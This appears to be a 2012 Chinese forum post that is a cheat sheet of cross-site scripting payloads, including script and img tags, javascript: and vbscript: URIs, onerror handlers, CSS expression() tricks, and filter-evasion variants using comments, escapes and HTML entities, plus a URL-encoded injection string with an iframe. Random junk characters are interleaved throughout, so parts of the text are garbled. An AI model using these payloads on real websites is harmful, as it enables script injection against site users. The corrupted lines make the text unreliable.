<script>alert("跨站")</script> (最常用)+ O; D8 b, K* ?) T
<img scr=javascript:alert("跨站")></img>8 S8 a% U" r! {$ x6 D& o0 S
<img scr="javascript: alert(/跨站/)></img>; ^5 _/ J% g7 C% P' T6 ?6 N
<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)
8 K: N" d9 p) J7 R<img scr="#" onerror=alert(/跨站/)></img>4 f- l' f) ?" ~# l
<img scr="#" style="xss:expression(alert(/xss/));"></img>5 y$ e' G+ A* {& \8 E' `% J
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)" G. y2 O: p- f! U2 v* `
<img src=vbscript:msgbox ("xss")></img>
$ _! I1 B9 a, R0 T* N: h<style> input {left:expression (alert('xss'))}</style>; m' R7 e9 p6 u
<div style={left:expression (alert('xss'))}></div>& N5 I: K' b$ a1 T7 O) s5 O
<div style={left:exp/* */ression (alert('xss'))}></div>/ B1 T# F; j. t" l9 I$ y
<div style={left:\0065\0078ression (alert('xss'))}></div>; `8 W8 _, J Q1 V, j+ F) g
html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>, n% e5 e+ W2 Y& F
unicode <div style="{left:expRessioN (alert('xss'))}">- V: x8 W# ? H# a$ [9 b
) C1 J. g) f$ {. i
"]}%3Cscript%3Ealert('我又来啦!.')%3C/script%3E{[&item="]<iframe%20src=WWW.BAIDU.COM%20width=400%20height=600></iframe>["( }9 P; L2 r# O% t
|
发表于 2012-9-15 14:09:13
收藏
支持
反对